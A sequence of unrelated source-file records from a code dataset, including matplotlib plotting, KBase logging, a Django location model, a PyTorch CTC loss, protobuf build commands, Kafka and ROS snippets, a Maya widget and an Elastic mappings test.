vfatCnt0%6].plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n leg = 
ax.legend(loc=\"center right\", ncol=2)\r\n ax.set_title(\"VFAT%02d\"%vfat)\r\n fig.savefig((directoryName+\"/scurve_\"+oh+\"_VFAT%02d.pdf\")%vfat)\r\n plt.close(fig)\r\n\r\n if numVfats == 1:\r\n ax2.set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2.set_ylabel(\"Fired events / total events\", loc = 'top')\r\n ax2.set_title(\"VFAT%02d\"%vfat)\r\n leg2 = ax2.legend(loc=\"center right\", ncol=2)\r\n ax2.text(-0.09, 1.01, 'CMS', fontweight='bold', fontsize=26, transform=ax2.transAxes)\r\n ax2.text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=24, transform=ax2.transAxes)\r\n elif numVfats <= 3:\r\n ax2[vfatCnt0].set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2[vfatCnt0].set_ylabel(\"Fired events / total events\", loc = 'top')\r\n ax2[vfatCnt0].set_title(\"VFAT%02d\"%vfat)\r\n leg2[vfatCnt0] = ax2[vfatCnt0].legend(loc=\"center right\", ncol=2)\r\n ax2[vfatCnt0].text(-0.09, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax2[vfatCnt0].transAxes)\r\n ax2[vfatCnt0].text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax2[vfatCnt0].transAxes)\r\n elif numVfats <= 6:\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].set_ylabel(\"Fired events / total events\", loc = 'top')\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].set_title(\"VFAT%02d\"%vfat)\r\n leg2[int(vfatCnt0/3), vfatCnt0%3] = ax2[int(vfatCnt0/3), vfatCnt0%3].legend(loc=\"center right\", ncol=2)\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].text(-0.11, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax2[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax2[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n else:\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].set_ylabel(\"Fired events / total events\", loc = 'top')\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].set_title(\"VFAT%02d\"%vfat)\r\n leg2[int(vfatCnt0/6), vfatCnt0%6] = ax2[int(vfatCnt0/6), vfatCnt0%6].legend(loc=\"center right\", ncol=2)\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax2[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax2[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n\r\n\r\n vfatCnt0+=1\r\n\r\n fig2.tight_layout()\r\n fig2.savefig((directoryName+\"/scurve_\"+oh+\".pdf\"))\r\n plt.close(fig2)\r\n\r\n print(Colors.GREEN + 'Plots saved at %s' % directoryName + Colors.ENDC)\r\n\r\n\r\n\r\n\r\n","sub_path":"lpgbt_vfat_plot_scurve.py","file_name":"lpgbt_vfat_plot_scurve.py","file_ext":"py","file_size_in_byte":17846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"67427358","text":"\"\"\"\nCommon narrative logging functions.\n\nOther biokbase modules can use the logging like this:\n\n from biokbase.narrative.common.kblogging import get_logger\n _log = get_logger(__name__)\n\nLog messages are free-form, *but* the MongoDB handler will break any\nparts of the message in the form '<name>=<value>' into their own fields\nin the MongoDB record.\n\nLogging to MongoDB will be enabled, via proxy, if the proxy is\nrunning on the pre-configured host/port\n\"\"\"\n__author__ = 'Dan Gunter '\n__date__ = '2014-07-31'\n\nimport logging\nfrom logging.handlers import SocketHandler\nimport os\nimport re\nimport socket\n# 
IPython\nimport IPython\n# Local\nfrom .util import kbase_env\nfrom . import log_proxy\n\n## Constants\n\nKBASE_TMP_DIR = \"/tmp\"\nKBASE_TMP_LOGFILE = os.path.join(KBASE_TMP_DIR, \"kbase-narrative.log\")\n\n# env var with location of proxy config file\nKBASE_PROXY_ENV = 'KB_PROXY_CONFIG'\n\n## Functions\n\ndef get_logger(name=\"\"):\n \"\"\"Get a given KBase log obj.\n\n :param name: name (a.b.c) of the logging namespace, which may be\n relative or absolute (starting with 'biokbase.'), or\n empty in which case the root logger is returned\n :return: Log object\n :rtype: logging.Logger\n \"\"\"\n # no name => root\n if not name:\n log = logging.getLogger(\"biokbase\")\n # absolute name\n elif name.startswith(\"biokbase.\"):\n log = logging.getLogger(name)\n # relative name\n else:\n log = logging.getLogger(\"biokbase.\" + name)\n\n adapter = LogAdapter(log, _get_meta())\n\n return adapter\n\ndef log_event(log, event, mapping):\n \"\"\"Log an event and a mapping.\n \"\"\"\n kvp = \" \".join([\"{}={}\".format(k, v) for k, v in mapping.iteritems()])\n log.info(\"{}{}{}\".format(event, log_proxy.EVENT_MSG_SEP, kvp))\n\nclass LogAdapter(logging.LoggerAdapter):\n \"\"\"\n Add some extra methods to the stock LoggerAdapter\n \"\"\"\n def __init__(self, log, extra):\n logging.LoggerAdapter.__init__(self, log, extra)\n self.handlers = log.handlers\n self.addHandler = log.addHandler\n self.removeHandler = log.removeHandler\n self.setLevel = log.setLevel\n self.isEnabledFor = log.isEnabledFor\n\ndef _get_meta():\n meta = {}\n\n\n # Auth values\n token = kbase_env.auth_token\n\n if token:\n # User\n m = re.search('un=([^|]+)', token)\n if m is not None:\n meta['user'] = m.group(1)\n\n # Session id\n sess = kbase_env.session\n if sess:\n meta['session_id'] = sess\n\n # Notebook name\n if kbase_env.narrative:\n meta['narr'] = kbase_env.narrative\n\n return meta\n\n\nclass MetaFormatter(logging.Formatter):\n def __init__(self):\n \"\"\"\n Format with metadata in the mix.\n \"\"\"\n logging.Formatter.__init__(\n self,\n \"%(levelname)s %(asctime)s %(name)s %(message)s\")\n\n def format(self, record):\n \"\"\"\n Add KB_* environment values at format time.\n \"\"\"\n s = logging.Formatter.format(self, record)\n return \"{} [{}]\".format(s, ' '.join([\"{}={}\".format(k, v)\n for k, v in os.environ.items()\n if k.startswith('KB_')]))\n\n\ndef init_handlers():\n \"\"\"\n Initialize and add the log handlers.\n \"\"\"\n # Turn on debugging by setting environment variable KBASE_DEBUG.\n if os.environ.get(\"KBASE_DEBUG\", None):\n g_log.setLevel(logging.DEBUG)\n else:\n g_log.setLevel(logging.INFO)\n\n # Add log handler and assoc. 
formatter for metadata\n hndlr = logging.FileHandler(KBASE_TMP_LOGFILE)\n hndlr.setFormatter(MetaFormatter())\n g_log.addHandler(hndlr)\n\n # If local forwarder is available, add that one too\n has_local_forwarder = True\n config_file = os.environ.get(KBASE_PROXY_ENV, None)\n proxy_config = log_proxy.ProxyConfiguration(config_file)\n # Attempt a connection\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((proxy_config.host, proxy_config.port))\n except socket.error:\n has_local_forwarder = False\n g_log.debug(\"init_handlers local_forwarder=false\")\n # If connection succeeds, add a logging.handler\n if has_local_forwarder:\n g_log.debug(\"init_handlers local_forwarder=true\")\n sock_handler = SocketHandler(proxy_config.host,\n proxy_config.port)\n g_log.addHandler(sock_handler)\n else:\n g_log.debug(\"init_handlers local_forwarder=false\")\n\ndef reset_handlers():\n \"\"\"Remove & re-add all handlers.\n \"\"\"\n while g_log.handlers:\n g_log.removeHandler(g_log.handlers.pop())\n init_handlers()\n\n## Run the rest of this on import\n\n# Get root log obj.\ng_log = get_logger()\n\n# If no handlers, initialize them\nif not g_log.handlers:\n init_handlers()\n","sub_path":"src/biokbase/narrative/common/kblogging.py","file_name":"kblogging.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"163624038","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLocation - app to save location aware objects into the database.\nThis is created for ASI (Aalto Social Interface).\n\nPostGIS data type 'geography' is used instead of traditional geometry. For further details, see:\nhttp://postgis.refractions.net/documentation/manual-1.5/ch04.html#PostGIS_GeographyVSGeometry\n\"\"\"\n\nimport string\nimport random\n\nfrom django.conf import settings\nfrom django.contrib.gis.db import models\nfrom django.contrib.auth.models import User\n\ndef get_guid(length=12):\n \"\"\"\n Generate and return a random string which can be considered unique.\n Default length is 12 characters from set [a-zA-Z0-9].\n \"\"\"\n alphanum = string.letters + string.digits\n return ''.join([alphanum[random.randint(0,len(alphanum)-1)] for i in xrange(length)])\n\nclass Entity(models.Model):\n \"\"\"\n Entity is an object with geographical coordinates.\n Fields:\n * guid, globally unique id, usually a random string\n * user, foreign key to an Auth.User object\n * name, optional\n * description, optional\n * created and updated, auto-timestamps\n * geography, GIS field for location (see PostGIS 1.5) or\n http://workshops.opengeo.org/postgis-intro/geography.html\n \"\"\"\n guid = models.CharField(max_length=40, default=get_guid, unique=True, db_index=True)\n user = models.ForeignKey(User, blank=True, null=True)\n name = models.CharField(max_length=150, blank=True, default='', editable=True)\n description = models.TextField(blank=True, default='', editable=True)\n created = models.DateTimeField(auto_now_add=True, editable=False)\n updated = models.DateTimeField(auto_now=True, editable=False)\n objects = models.GeoManager()\n geography = models.PointField(geography=True, editable=True)\n\n def __unicode__(self):\n return u\"%s (%s)\" % (self.name, str(self.geography)[:50])\n","sub_path":"MestaDB/mestadb/location/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555869084","text":"import torch.nn as 
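# A minimal sketch, not part of the original location/models.py: get_guid()
# above depends on string.letters and xrange, both removed in Python 3, and
# draws from random, which is not meant for identifiers that should be hard
# to guess. A Python-3 equivalent using the standard secrets module:
import secrets
import string

def get_guid_py3(length=12):
    """Random string from [a-zA-Z0-9]; cryptographically strong choices."""
    alphanum = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphanum) for _ in range(length))

print(get_guid_py3())  # e.g. 'aZ3kQ9xLm0Pq'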
nn\nimport torch.nn.functional as F\n\nfrom ..functions.ctc_loss import CTCLossFunction\n\n\nclass CTCLoss(nn.Module):\n \"\"\"\n Criterion to compute CTC Loss as described in ``_\n\n :param size_average: if compute average loss (only if reduce is True)\n :param reduce: if compute mean or average loss (if None, returns full tensor of shape ``(batch_size,)``)\n :param after_logsoftmax: if logsoftmax is used before passing neural network outputs \\n\n (else takes pure network outputs)\n :param time_major: if logits are time major (or batch major), default ``True``\n :param blank_idx: id of blank label, default ``0``\n \"\"\"\n\n def __init__(self, size_average=None, reduce=None, after_logsoftmax=False, time_major=False, blank_idx=0):\n super(CTCLoss, self).__init__()\n self._blank_index = blank_idx\n self._reduce = reduce\n self._size_average = size_average\n self._after_logsoftmax = after_logsoftmax\n self._time_major = time_major\n\n def forward(self, logits, targets, logits_lengths, targets_lengths):\n \"\"\"\n Computes CTC Loss\n\n :param logits: Float or Double Tensor (network output)\n of shape ``(sequence_length, batch_size, alphabet_size)`` if ``time_major`` is True,\n else of shape ``(batch_size, sequence_length, alphabet_size)``\n :param targets: Tensor with targets of shape ``(batch_size, targets_sequence_length)``\n :param logits_lengths: Tensor of shape ``(batch_size,)`` with lengths of sequences\n :param targets_lengths: Tensor of shape ``(batch_size,)`` with lengths of target sequences\n :return: tensor with CTC loss of shape ``(batch_size,)`` if ``reduce is None`` else of shape ``(1,)``\n \"\"\"\n if self._after_logsoftmax:\n logits_logsoftmax = logits\n else:\n logits_logsoftmax = F.log_softmax(logits, dim=2)\n\n if self._time_major:\n logits_logsoftmax = logits_logsoftmax.permute(1, 0, 2)\n # shape of logits_logsoftmax now: batch_size, sequence_length, alphabet_size\n\n loss = CTCLossFunction().apply(logits_logsoftmax, targets, logits_lengths, targets_lengths, self._blank_index)\n\n if self._reduce:\n if self._size_average:\n return loss.mean()\n else:\n return loss.sum()\n return loss\n","sub_path":"pytorch_end2end/modules/ctc_loss.py","file_name":"ctc_loss.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"240880021","text":"from distutils.spawn import find_executable\nfrom distutils.command.build import build\nfrom distutils.command.clean import clean\nfrom distutils.cmd import Command\nfrom distutils import log\nimport sys\nimport os\n\nclass clean_proto(clean):\n def run(self):\n clean.run(self)\n for package in self.distribution.packages:\n for root, dirs, files in os.walk(package):\n for filename in files:\n path = os.path.join(root, filename)\n if self.is_pb2_file(filename):\n log.info(\"removing generated file '%s'\" % path)\n os.remove(path)\n\n def is_pb2_file(self, filename):\n base, u, rest = filename.rpartition('_')\n return rest == 'pb2.py'\n\nclass build_proto(Command):\n description = \"build .proto files into Python modules\"\n user_options = [\n ('protoc=', None, 'location of the protoc compiler'),\n ('indir=', 'i', 'where to find the *.proto files to compile'),\n ('outdir=', 'o', 'where to output the generated Python code'),\n ('force', 'f', 'forcibly build everything (ignore file timestamps)')]\n\n boolean_options = ['force']\n\n def initialize_options(self):\n self.indir = None\n self.outdir = None\n self.protoc = None\n self.force = None\n\n def 
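# A minimal sketch, not part of the original ctc_loss.py: the CTCLoss module
# above wraps a custom CTCLossFunction; PyTorch's built-in torch.nn.CTCLoss
# computes the same criterion and is a useful reference point. Note that the
# built-in expects time-major log-probabilities of shape (T, N, C), whereas
# the module above defaults to batch-major input.
import torch
import torch.nn.functional as F

T, N, C, S = 50, 4, 20, 10            # time, batch, alphabet, target length
log_probs = F.log_softmax(torch.randn(T, N, C), dim=2)
targets = torch.randint(1, C, (N, S), dtype=torch.long)   # label 0 is blank
input_lengths = torch.full((N,), T, dtype=torch.long)
target_lengths = torch.full((N,), S, dtype=torch.long)

ctc = torch.nn.CTCLoss(blank=0, reduction="none")  # per-sample losses, (N,)
loss = ctc(log_probs, targets, input_lengths, target_lengths)
print(loss.shape)  # torch.Size([4])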
finalize_options(self):\n self.set_undefined_options('build', ('force', 'force'))\n\n if self.indir is None:\n self.indir = os.path.join('.', 'src')\n if self.outdir is None:\n self.outdir = os.path.join('.', self.distribution.packages[0])\n\n if self.protoc is None:\n self.protoc = find_executable('protoc')\n if self.protoc is None:\n raise RuntimeError(\"No protoc compiler was found!\")\n\n def run(self):\n for protofile in self.get_proto_files():\n outputfile = self.pb2_filename(protofile)\n outputdir = os.path.dirname(outputfile)\n self.make_file(protofile, outputfile, self.generate_proto, [protofile, outputdir])\n self.reinitialize_command('build_py')\n\n def get_proto_files(self):\n protos = []\n for root, dirs, files in os.walk(self.indir):\n for filename in files:\n if self.is_proto_file(filename):\n self.debug_print(\"Found protobuffs definition: %s\" % filename)\n protos.append(os.path.join(root, filename))\n return protos\n\n def is_proto_file(self, filename):\n base, dot, ext = filename.rpartition(\".\")\n return (ext == \"proto\")\n\n def pb2_filename(self, source):\n return source.replace(\".proto\", \"_pb2.py\").replace(self.indir, self.outdir)\n\n # Lifted and modified from the google project\n def generate_proto(self, source, outputdir):\n \"\"\"Invokes the Protocol Compiler to generate a _pb2.py from the given\n .proto file..\"\"\"\n\n protoc_command = [ self.protoc,\n \"-I%s\" % self.indir,\n \"--python_out=%s\" % outputdir,\n source ]\n result = self.spawn(protoc_command, 0)\n if result is not None and result[1] is not 0:\n raise SystemError(\"protoc command failed: '%s'\" % protoc_command.join(' '))\n\n# Inject our .proto compiler into the front of the build commands\nbuild.sub_commands.insert(0, ('build_proto', None))\n","sub_path":"proto_cmd.py","file_name":"proto_cmd.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"389305055","text":"__author__ = 'TzAnAnY'\n\nSAVED = {}\n\n\ndef patch_item(module, attr, new_item):\n obj = object()\n old_item = getattr(module, attr, obj)\n if old_item is not obj:\n SAVED.setdefault(module.__name__, {}).setdefault(attr, old_item)\n setattr(module, attr, new_item)\n\n\ndef patch_socks():\n from .httpclient import HTTPRequest\n import tornado.httpclient\n patch_item(tornado.httpclient, 'HTTPRequest', HTTPRequest)\n\n from .curl_httpclient import CurlAsyncHTTPClient\n import tornado.curl_httpclient\n patch_item(tornado.curl_httpclient, 'CurlAsyncHTTPClient', CurlAsyncHTTPClient)\n\n","sub_path":"monkey/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"395346409","text":"from day5 import compile\ndef init():\n input = ''\n with open('./day7-input.txt', 'r', encoding='utf-8') as file:\n input = file.read()\n instructions = [int(piece) for piece in input.split(',')]\n return instructions\nprogram = init()\nprint(program)\n\ncompile(program)","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"531290446","text":"import rospy\nfrom robot import Robot\n\n\ndef main():\n\n rospy.init_node('tr_control')\n\n rate = rospy.Rate(10)\n r = Robot()\n\n while not rospy.is_shutdown():\n r.publish_motors()\n rate.sleep()\n\n\nif __name__ == '__main__':\n 
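# A minimal sketch, not part of the original proto_cmd.py: the error check in
# generate_proto() above has two bugs. "result[1] is not 0" compares object
# identity instead of value (use !=), and protoc_command.join(' ') reverses
# the str.join() call -- lists have no join method. A corrected check:
protoc_command = ["protoc", "-I./src", "--python_out=./pkg", "msg.proto"]
result = None   # stand-in for the return value of self.spawn(protoc_command, 0)
if result is not None and result[1] != 0:
    raise SystemError("protoc command failed: '%s'" % " ".join(protoc_command))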
main()\n","sub_path":"tr_control/src/tr_control/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"274096927","text":"import json\n\nfrom kafka import KafkaProducer\n\nfrom code.servers import bootstrap_servers\nfrom code.topics import TOPIC_1\n\n\ndef on_send_success(record_metadata):\n print(f'PRODUCER: Send to {record_metadata.topic}:{record_metadata.partition}:{record_metadata.offset}')\n\n\ndef on_send_error(ex):\n print(f'PRODUCER: {ex}')\n # handle exception\n\n\ndef send_json_message(key: str, value: str):\n\n print('Start Producing')\n\n producer = KafkaProducer(bootstrap_servers=bootstrap_servers,\n value_serializer=lambda m: json.dumps(m).encode('ascii'))\n producer.send(TOPIC_1, {key: value})\\\n .add_callback(on_send_success)\\\n .add_errback(on_send_error)\n\n # block until all async messages are sent\n producer.flush()\n\n print('Finish Producing')\n return True\n\n\nif __name__ == '__main__':\n\n send_json_message('Key', 'Value')\n","sub_path":"code/messaging_async/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"28713275","text":"from PySide2 import QtWidgets, QtCore, QtGui\nfrom maya import OpenMayaUI as omui\nimport maya.cmds as m\nfrom shiboken2 import wrapInstance\nfrom peel_solve import time_util, roots, solve\nimport math\n\n\n\n\n\n\nclass TimeRangeWidget(QtWidgets.QWidget):\n\n def __init__(self, parent=None):\n \"\"\" The initialization includes setting up the UI framework for the tool window, which asks the user\n for the c3d files, as well as the start and end frames.\"\"\"\n\n super(TimeRangeWidget, self).__init__(parent)\n\n layout = QtWidgets.QVBoxLayout()\n\n self.ranges = QtWidgets.QTableWidget()\n self.ranges.setColumnCount(3)\n self.ranges.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)\n self.ranges.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)\n self.ranges.cellDoubleClicked.connect(self.select_event)\n\n layout.addWidget(self.ranges)\n\n low_bar = QtWidgets.QHBoxLayout()\n\n low_bar.addWidget(QtWidgets.QLabel(\"Start TC\"))\n self.tc_start = QtWidgets.QLineEdit()\n low_bar.addWidget(self.tc_start)\n\n low_bar.addWidget(QtWidgets.QLabel(\"TC Rate\"))\n self.tc_rate = QtWidgets.QLineEdit()\n low_bar.addWidget(self.tc_rate)\n\n low_bar.addWidget(QtWidgets.QLabel(\"Offset (sec)\"))\n self.tc_offset = QtWidgets.QLineEdit()\n low_bar.addWidget(self.tc_offset)\n\n low_bar.addWidget(QtWidgets.QLabel(\"Start#\"))\n self.frame_start = QtWidgets.QLineEdit()\n low_bar.addWidget(self.frame_start)\n\n self.solve_button = QtWidgets.QPushButton(\"Solve Selected\")\n self.solve_button.pressed.connect(self.do_solve)\n low_bar.addWidget(self.solve_button)\n\n self.solve_all_button = QtWidgets.QPushButton(\"Solve All\")\n self.solve_all_button.pressed.connect(self.do_solve_all)\n low_bar.addWidget(self.solve_all_button)\n\n low_bar.addStretch(1)\n\n layout.addItem(low_bar)\n\n self.setLayout(layout)\n\n self.resize(500, 250)\n\n self.populate()\n\n def clear(self):\n self.populate()\n\n def populate(self):\n self.ranges.setRowCount(0)\n self.ranges.clear()\n\n optical_root = roots.optical()\n if optical_root is None:\n self.tc_offset.setText(\"\")\n self.tc_rate.setText(\"\")\n self.tc_start.setText(\"\")\n return\n \n self.frame_start.setText(str(time_util.c3d_start(optical_root)))\n\n 
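# A minimal sketch, not part of the original producer.py: a consumer
# counterpart to the JSON producer above. The topic name and broker address
# below are stand-ins for the TOPIC_1 and bootstrap_servers values imported
# from code.topics / code.servers; kafka-python's KafkaConsumer mirrors the
# producer's value_serializer with a value_deserializer.
import json
from kafka import KafkaConsumer

consumer = KafkaConsumer(
    "topic-1",                              # stand-in for TOPIC_1
    bootstrap_servers=["localhost:9092"],   # stand-in for bootstrap_servers
    value_deserializer=lambda m: json.loads(m.decode("ascii")),
    auto_offset_reset="earliest",
)
for message in consumer:
    print(f"CONSUMER: {message.topic}:{message.partition}:"
          f"{message.offset} value={message.value}")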
tc_standard = m.getAttr(optical_root + \".C3dTimecodeStandard\")\n offset = m.getAttr(optical_root + \".C3dFirstField\")\n rate = m.getAttr(optical_root + \".C3dRate\")\n self.tc_offset.setText(\"%.2f\" % (offset / rate))\n self.tc_rate.setText(str(tc_standard))\n\n hh = m.getAttr(optical_root + \".C3dTimecodeH\")\n mm = m.getAttr(optical_root + \".C3dTimecodeM\")\n ss = m.getAttr(optical_root + \".C3dTimecodeS\")\n ff = m.getAttr(optical_root + \".C3dTimecodeF\")\n\n self.tc_start.setText(\"%02d:%02d:%02d:%02d\" % (hh, mm, ss, ff))\n\n def add_range(self, name, start, end):\n row = self.ranges.rowCount()\n self.ranges.setRowCount(row+1)\n self.ranges.setItem(row, 0, QtWidgets.QTableWidgetItem(name))\n self.ranges.setItem(row, 1, QtWidgets.QTableWidgetItem(start))\n self.ranges.setItem(row, 2, QtWidgets.QTableWidgetItem(end))\n\n def get_range(self, row):\n tc_rate = float(self.tc_rate.text())\n\n c3d_start = time_util.c3d_start(roots.optical())\n\n start_tc = time_util.Timecode(str(self.ranges.item(row, 1).text()), tc_rate)\n end_tc = time_util.Timecode(str(self.ranges.item(row, 2).text()), tc_rate)\n\n print(\"Start: \" + start_tc.info())\n print(\"End: \" + end_tc.info())\n print(\"Offset: \" + c3d_start.info())\n\n a = start_tc - c3d_start\n b = end_tc - c3d_start\n\n a.set_rate(time_util.fps())\n b.set_rate(time_util.fps())\n\n print(\"Start: \" + a.info())\n print(\"End: \" + b.info())\n\n return a.frame(), b.frame()\n\n def select_event(self, row):\n start, end = self.get_range(row)\n\n m.playbackOptions(min=math.floor(start), max=math.ceil(end))\n\n def do_solve(self, all=False):\n for i in range(self.ranges.rowCount()):\n row = self.ranges.item(i, 0)\n if all is True or row.isSelected():\n start, end = self.get_range(i)\n solve.run(start=start, end=end)\n\n def do_solve_all(self):\n self.do_solve(all=True)\n\n\n\nclass TimeRanges(QtWidgets.QDialog):\n\n def __init__(self, parent=None):\n\n if parent is None:\n pointer = omui.MQtUtil.mainWindow()\n parent = wrapInstance(long(pointer), QtWidgets.QWidget)\n\n super(TimeRanges, self).__init__(parent)\n\n layout = QtWidgets.QVBoxLayout()\n self.table = TimeRangeWidget()\n layout.addWidget(self.table)\n self.setLayout(layout)\n self.resize(500, 250)\n\nINSTANCE = None\n\ndef show():\n \"\"\" Create the gui if it doesn't exist, or show if it does \"\"\"\n global INSTANCE\n if not INSTANCE:\n INSTANCE = TimeRanges()\n INSTANCE.show()\n return INSTANCE\n","sub_path":"python/peel_solve/time_range.py","file_name":"time_range.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"579209489","text":"# Copyright 2021 Curtin University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Author: James Diprose\n\nfrom __future__ import annotations\n\nimport json\nimport os\n\nfrom oaebu_workflows.config import elastic_mappings_folder\nfrom oaebu_workflows.dags.elastic_import_workflow import load_elastic_mappings_oaebu\nfrom 
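# A minimal sketch, not part of the original time_range.py: TimeRanges above
# calls wrapInstance(long(pointer), ...), but the long() builtin was removed
# in Python 3, so this raises NameError under Maya 2022+ (Python 3). A
# two-line shim keeps the module working on both interpreters:
try:
    long                  # Python 2: the builtin exists
except NameError:
    long = int            # Python 3: int covers arbitrary-width pointers

print(long(2**40))        # 1099511627776 on either interpreter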
observatory.platform.utils.config_utils import module_file_path\nfrom observatory.platform.utils.jinja2_utils import render_template\nfrom observatory.platform.utils.test_utils import ObservatoryEnvironment, ObservatoryTestCase\nfrom observatory.platform.utils.workflow_utils import make_dag_id\n\n\nclass TestElasticImportWorkflow(ObservatoryTestCase):\n \"\"\"Tests for the Elastic Import Workflow\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.project_id = os.getenv(\"TEST_GCP_PROJECT_ID\")\n self.data_location = os.getenv(\"TEST_GCP_DATA_LOCATION\")\n\n def test_load_elastic_mappings_oaebu(self):\n \"\"\"Test load_elastic_mappings_oaebu\"\"\"\n\n aggregate_level = \"product\"\n path = elastic_mappings_folder()\n expected = [\n (\n \"oaebu_anu_press_book_product_author_metrics\",\n render_template(\n os.path.join(path, \"oaebu-author-metrics-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_list\",\n render_template(\n os.path.join(path, \"oaebu-list-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics\",\n render_template(\n os.path.join(path, \"oaebu-metrics-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_city\",\n render_template(\n os.path.join(path, \"oaebu-metrics-city-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_country\",\n render_template(\n os.path.join(path, \"oaebu-metrics-country-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_events\",\n render_template(\n os.path.join(path, \"oaebu-metrics-events-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_institution\",\n render_template(\n os.path.join(path, \"oaebu-metrics-institution-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_referrer\",\n render_template(\n os.path.join(path, \"oaebu-metrics-referrer-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_publisher_metrics\",\n render_template(\n os.path.join(path, \"oaebu-publisher-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_bic_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-bic-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_bisac_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-bisac-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_thema_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-thema-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_year_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-year-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_year_metrics\",\n render_template(\n os.path.join(path, \"oaebu-year-metrics-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_unmatched_book_metrics\",\n render_template(\n os.path.join(path, 
